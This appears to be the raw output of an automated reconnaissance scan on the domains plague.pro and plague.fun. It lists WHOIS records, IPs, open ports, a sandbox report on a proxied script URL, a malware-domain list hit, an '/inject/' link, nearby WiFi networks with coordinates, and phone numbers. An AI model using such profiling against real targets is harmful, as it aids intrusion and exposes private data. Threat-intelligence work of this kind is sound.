B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C: 5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99 Timestamp : Nov 4 14:11:41.669 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:21:00:BC:8C:85:EB:BF:C4:F0:D8:87:E4:7E: 9A:66:96:15:69:77:5E:F2:F1:6F:3E:38:4A:C5:76:3E: 2C:DC:1A:EB:D2:02:20:61:78:80:BB:40:53:87:01:17: 2B:57:28:2B:12:98:D1:E2:D9:92:0D:AE:2C:2D:7E:80: A1:F9:F3:28:94:F5:0D Signature Algorithm: sha256WithRSAEncryption 81:c9:a3:c8:90:35:93:2a:8c:1b:1f:6f:e0:91:16:89:4e:d8: 16:b3:13:76:a0:ea:70:93:c4:72:12:a6:3d:f7:6c:09:d9:c7: 9c:fc:40:db:11:66:f3:17:9f:92:e1:94:35:c0:be:ba:6e:09: be:dd:47:e1:d6:58:c9:0e:de:94:20:04:f1:54:ce:02:fb:70: 50:31:09:a2:1e:93:7c:a5:04:28:a5:81:5b:c8:75:a0:3a:bf: b8:3b:81:a5:6f:5a:ac:99:2d:02:48:ac:2d:a1:3a:f1:06:cd: 57:4c:ed:e5:e9:a8:1c:25:ba:ce:4c:cd:db:56:23:21:6d:cc: dc:1d:42:f1:09:dc:28:a8:96:ae:bc:db:68:11:5b:cf:63:92: fd:93:35:33:e9:51:30:78:d8:1a:fd:54:2c:07:04:04:19:f8: b2:75:bc:ef:f1:48:56:41:8f:64:9a:f0:27:1d:eb:3b:2d:69: 8d:0d:0e:45:56:30:8e:6e:97:93:53:d5:e1:6b:b7:1c:ff:00: 58:d5:07:5e:22:d6:ce:4f:02:d8:2c:b5:9f:2e:4c:50:d4:90: 9d:17:99:b9:54:b6:e2:f8:49:96:e8:e4:9c:3f:b0:87:1f:21: 2a:69:a9:ad:a1:95:af:68:45:92:c8:bb:99:17:d4:fc:90:cb: 05:d3:da:6b plague.fun 2022-12-18 00:14:26 HTTP Status Code No Web Spider 0 0 2 0 None None https://misogyny.wtf/inject/UsRjS959Rqm4sPG4 2022-12-18 00:27:43 Similar Domain - Whois No Whois 2 0 2 0 None Domain Name: plague.pro Registry Domain ID: 63d81ab88f224721bf7defd24d12c687-DONUTS Registrar WHOIS Server: whois.reg.com Registrar URL: Updated Date: 2022-12-03T10:20:48Z Creation Date: 2018-11-20T18:17:14Z Registry Expiry Date: 2023-11-20T18:17:14Z Registrar: Registrar of Domain Names REG.RU LLC Registrar IANA ID: 1606 Registrar Abuse Contact Email: abuse@reg.ru Registrar Abuse Contact Phone: +7.4955801111 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Data Protected Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: ON Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: CA Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: rita.ns.cloudflare.com Name Server: augustus.ns.cloudflare.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:27:42Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Identity Digital Inc. provides this Whois service for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Identity Digital does not guarantee its accuracy. Users accessing the Identity Digital Whois service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Identity Digital or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. When using the Identity Digital Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/ Identity Digital Inc. reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. Domain name: PLAGUE.PRO Registry Domain ID: 63d81ab88f224721bf7defd24d12c687-DONUTS Registrar WHOIS Server: whois.reg.com Registrar URL: https://www.reg.com Registrar URL: https://www.reg.ru Updated Date: 2022-12-03T10:20:48Z Creation Date: 2018-11-20T18:17:14Z Registrar Registration Expiration Date: 2023-11-20T18:17:14Z Registrar: Registrar of domain names REG.RU LLC Registrar IANA ID: 1606 Registrar Abuse Contact Email: abuse@reg.ru Registrar Abuse Contact Phone: +7.4955801111 Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited Registrant ID: Registrant Name: Protection of Private Person Registrant Street: PO box 87, REG.RU Protection Service Registrant City: Moscow Registrant State/Province: Registrant Postal Code: 123007 Registrant Country: RU Registrant Phone: +7.4955801111 Registrant Phone Ext: Registrant Fax: +7.4955801111 Registrant Fax Ext: Registrant Email: PLAGUE.PRO@regprivate.ru Admin ID: Admin Name: Protection of Private Person Admin Street: PO box 87, REG.RU Protection Service Admin City: Moscow Admin State/Province: Admin Postal Code: 123007 Admin Country: RU Admin Phone: +7.4955801111 Admin Phone Ext: Admin Fax: +7.4955801111 Admin Fax Ext: Admin Email: PLAGUE.PRO@regprivate.ru Tech ID: Tech Name: Protection of Private Person Tech Street: PO box 87, REG.RU Protection Service Tech City: Moscow Tech State/Province: Tech Postal Code: 123007 Tech Country: RU Tech Phone: +7.4955801111 Tech Phone Ext: Tech Fax: +7.4955801111 Tech Fax Ext: Tech Email: PLAGUE.PRO@regprivate.ru Name Server: augustus.ns.cloudflare.com Name Server: rita.ns.cloudflare.com DNSSEC: Unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022.12.18T03:27:43Z <<< For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en. TERMS OF USE: The Whois and RDAP services are provided by REG.RU, and contain information pertaining to Internet domain names registered by our customers. By using this service you are agreeing (1) not to use any information presented here for any purpose other than determining ownership of domain names, (2) not to store or reproduce this data in any way, (3) not to use any high-volume, automated, electronic processes to obtain data from this service. Abuse of this service is monitored and actions in contravention of these terms will result in being permanently blacklisted. All data is (c) Registrar of Domain Names REG.RU LLC (https://www.reg.com) plague.pro 2022-12-18 00:12:31 Physical Location No ipapi.co 0 0 2 0 None Toronto, Ontario, ON, Canada, CA 104.21.7.179 2022-12-18 00:12:13 Physical Location No ipapi.co 0 0 2 0 None Amsterdam, North Holland, NH, Netherlands, NL 188.114.96.1 2022-12-18 00:03:32 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None lhcp3234.webapps.net 81.88.52.234 2022-12-18 00:09:52 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.20:443 188.114.96.0/24 2022-12-18 00:06:24 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://womginx-proxy.toxictomato.repl.co/main/https:/pixiv.karakuri.ai/api/chats/popup.js', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_d6c_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_d6c_IESQMMUTEX_0_519"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_d6c_IESQMMUTEX_0_303"\n "IsoScope_d6c_IESQMMUTEX_0_331"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "UpdatingNewTabPageData"\n "IsoScope_d6c_ConnHashTable<3436>_HashTable_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_d6c_IE_EarlyTabStart_0x83c_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3436"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"womginx-proxy.toxictomato.repl.co"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar64E7.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar668F.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.149.204.188:443"'}, {u'category': u'General', u'origin': u'String', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /main/https:/pixiv.karakuri.ai/api/chats/popup.js HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: womginx-proxy.toxictomato.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /main/https:/pixiv.karakuri.ai/api/chats/popup.js HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: womginx-proxy.toxictomato.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab64D6.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab668E.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "5T4P5R4T.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\5T4P5R4T.txt]- [targetUID: 00000000-00003436]\n Dropped file: "UVFQX8LP.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\UVFQX8LP.txt]- [targetUID: 00000000-00003436]\n Dropped file: "T7XFVZAN.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\T7XFVZAN.txt]- [targetUID: 00000000-00003436]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002004]\n "_3CDD679F-5E30-11ED-B6C0-0800279D0805_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "Cab64D6.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab64D6.tmp]- [targetUID: 00000000-00002004]\n "background_gradient_1_" has type "JPEG image data JFIF standard 1.02 aspect ratio density 100x100 segment length 16 baseline precision 8 1x800 components 3"- [targetUID: N/A]\n "5T4P5R4T.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\5T4P5R4T.txt]- [targetUID: 00000000-00003436]\n "bullet_1_" has type "PNG image data 15 x 15 8-bit colormap non-interlaced"- [targetUID: N/A]\n "~DF2996F56F13130F3E.TMP" has type "data"- Location: [%TEMP%\\~DF2996F56F13130F3E.TMP]- [targetUID: 00000000-00003436]\n "http_403_1_" has type "HTML document UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "UVFQX8LP.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\UVFQX8LP.txt]- [targetUID: 00000000-00003436]\n "JavaDeployReg.log" has type "ASCII text with CRLF line terminators"- Location: [%TEMP%\\JavaDeployReg.log]- [targetUID: 00000000-00002004]\n "~DFB2C05183636C570F.TMP" has type "data"- Location: [%TEMP%\\~DFB2C05183636C570F.TMP]- [targetUID: 00000000-00003436]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003436]\n "info_48_1_" has type "PNG image data 47 x 48 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002004]\n "RecoveryStore._3CDD679D-5E30-11ED-B6C0-0800279D0805_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "T7XFVZAN.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\T7XFVZAN.txt]- [targetUID: 00000000-00003436]\n "Tar64E7.tmp" has type "data"- Location: [%TEMP%\\Tar64E7.tmp]- [targetUID: 00000000-00002004]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /main/https:/pixiv.karakuri.ai/api/chats/popup.js HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: womginx-proxy.toxictomato.repl.co\nDNT: 1\nConnection: Keep-Alive"\n "HTTP/1.1 403 Forbidden\nContent-Length: 80\nContent-Type: application/javascript\nContent-Type: text/html\nDate: Mon, 07 Nov 2022 00:58:49 GMT\nExpect-Ct: max-age=2592000, report-uri="https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"\nReplit-Cluster: global\nServer: nginx/1.20.1\nStrict-Transport-Security: max-age=7488101; includeSubDomains\n\n"'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://womginx-proxy.toxictomato.repl.co/main/https:/pixiv.karakuri.ai/api/chats/popup.js"\n Pattern match: "https://womginx-proxy.toxictomato.repl.co"\n Heuristic match: "womginx-proxy.toxictomato.repl.co"\n Pattern match: "pixiv.karakuri.ai/api/chats/popup.js"\n Pattern match: "https://sentry.repl.it/api/10/security/?sentry_key=615192fd532445bfbbbe966cd7131791"'}], u'threat_level': 0, u'size': None, u'job_id': u'63685626610e7538dc1ee633', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS 34.149.204.188 2022-12-18 00:27:45 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None plague.pro@regprivate.ru Domain Name: plague.pro Registry Domain ID: 63d81ab88f224721bf7defd24d12c687-DONUTS Registrar WHOIS Server: whois.reg.com Registrar URL: Updated Date: 2022-12-03T10:20:48Z Creation Date: 2018-11-20T18:17:14Z Registry Expiry Date: 2023-11-20T18:17:14Z Registrar: Registrar of Domain Names REG.RU LLC Registrar IANA ID: 1606 Registrar Abuse Contact Email: abuse@reg.ru Registrar Abuse Contact Phone: +7.4955801111 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Data Protected Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: ON Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: CA Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: rita.ns.cloudflare.com Name Server: augustus.ns.cloudflare.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:27:42Z <<< For more information on Whois status codes, please visit https://icann.org/epp Terms of Use: Identity Digital Inc. provides this Whois service for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Identity Digital does not guarantee its accuracy. Users accessing the Identity Digital Whois service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Identity Digital or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. When using the Identity Digital Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/ Identity Digital Inc. reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy. Domain name: PLAGUE.PRO Registry Domain ID: 63d81ab88f224721bf7defd24d12c687-DONUTS Registrar WHOIS Server: whois.reg.com Registrar URL: https://www.reg.com Registrar URL: https://www.reg.ru Updated Date: 2022-12-03T10:20:48Z Creation Date: 2018-11-20T18:17:14Z Registrar Registration Expiration Date: 2023-11-20T18:17:14Z Registrar: Registrar of domain names REG.RU LLC Registrar IANA ID: 1606 Registrar Abuse Contact Email: abuse@reg.ru Registrar Abuse Contact Phone: +7.4955801111 Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited Registrant ID: Registrant Name: Protection of Private Person Registrant Street: PO box 87, REG.RU Protection Service Registrant City: Moscow Registrant State/Province: Registrant Postal Code: 123007 Registrant Country: RU Registrant Phone: +7.4955801111 Registrant Phone Ext: Registrant Fax: +7.4955801111 Registrant Fax Ext: Registrant Email: PLAGUE.PRO@regprivate.ru Admin ID: Admin Name: Protection of Private Person Admin Street: PO box 87, REG.RU Protection Service Admin City: Moscow Admin State/Province: Admin Postal Code: 123007 Admin Country: RU Admin Phone: +7.4955801111 Admin Phone Ext: Admin Fax: +7.4955801111 Admin Fax Ext: Admin Email: PLAGUE.PRO@regprivate.ru Tech ID: Tech Name: Protection of Private Person Tech Street: PO box 87, REG.RU Protection Service Tech City: Moscow Tech State/Province: Tech Postal Code: 123007 Tech Country: RU Tech Phone: +7.4955801111 Tech Phone Ext: Tech Fax: +7.4955801111 Tech Fax Ext: Tech Email: PLAGUE.PRO@regprivate.ru Name Server: augustus.ns.cloudflare.com Name Server: rita.ns.cloudflare.com DNSSEC: Unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022.12.18T03:27:43Z <<< For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en. TERMS OF USE: The Whois and RDAP services are provided by REG.RU, and contain information pertaining to Internet domain names registered by our customers. By using this service you are agreeing (1) not to use any information presented here for any purpose other than determining ownership of domain names, (2) not to store or reproduce this data in any way, (3) not to use any high-volume, automated, electronic processes to obtain data from this service. Abuse of this service is monitored and actions in contravention of these terms will result in being permanently blacklisted. All data is (c) Registrar of Domain Names REG.RU LLC (https://www.reg.com) 2022-12-18 00:21:54 Open TCP Port No Censys 0 0 2 0 None 104.21.7.179:2086 104.21.7.179 2022-12-18 00:21:20 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["77b135839fef2d4c-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 188.114.97.1 2022-12-18 00:16:40 Blacklisted Affiliate Internet Name Yes DNS for Family 0 0 2 0 None DNS for Family [dns2.registrar-servers.com] dns2.registrar-servers.com 2022-12-18 00:31:07 Similar Domain Yes TLD Searcher 0 0 1 0 None plague.dog plague.fun 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None SurfandSip (Net ID: 00:02:2D:03:7C:7A) 37.7803446,-122.3906132 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None myLGNet8682 (Net ID: 00:01:36:5B:86:80) 37.7803446,-122.3906132 2022-12-18 00:02:47 Raw Data from RIRs No grep.app 0 0 1 0 None {u'repo': {u'raw': u'stamparm/maltrail'}, u'total_matches': {u'raw': u'1'}, u'content': {u'snippet': u'
8
utilities.tk
9
zerotwo-best-waifu.online
'}, u'branch': {u'raw': u'master'}, u'path': {u'raw': u'trails/static/malware/hacked_pypirepos.txt'}, u'id': {u'raw': u'g/stamparm/maltrail/trails/static/malware/hacked_pypirepos.txt'}, u'owner_id': {u'raw': u'921555'}} zerotwo-best-waifu.online 2022-12-18 00:03:26 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None 191.204.149.34.bc.googleusercontent.com 34.149.204.191 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None (Net ID: 00:02:2D:03:B5:60) 37.7803446,-122.3906132 2022-12-18 00:21:06 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 400 Bad Request Server: cloudflare Date: Content-Type: text/html Content-Length: 253 Connection: close CF-RAY: - 172.67.147.230 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None myLGNet8FBA (Net ID: 00:01:36:5C:8F:B8) 37.7803446,-122.3906132 2022-12-18 00:14:32 Country No Country Name Extractor 0 1 3 0 None Germany +492283296859 2022-12-18 00:20:36 BGP AS Membership No Censys 0 0 1 0 None 8075 137.117.157.128 2022-12-18 00:28:47 Physical Location No MetaDefender 0 0 3 0 None Firenze, Italy 81.88.48.102 2022-12-18 00:09:45 Physical Location No LeakIX 0 0 2 0 None Amsterdam, North Holland, Netherlands 188.114.96.9 2022-12-18 00:09:51 Co-Hosted Site No HackerTarget 0 0 2 0 None billing.cross.network 172.67.147.230 2022-12-18 00:06:04 Affiliate - Domain Name No DNS Resolver 0 0 2 0 None cloudflare.com journey.ns.cloudflare.com 2022-12-18 00:25:13 Affiliate - IP Address No DNS Look-aside 0 0 3 0 None 81.88.48.101 81.88.48.102 2022-12-18 00:12:19 Phone Number No Phone Number Extractor 0 0 2 0 None +3544212434 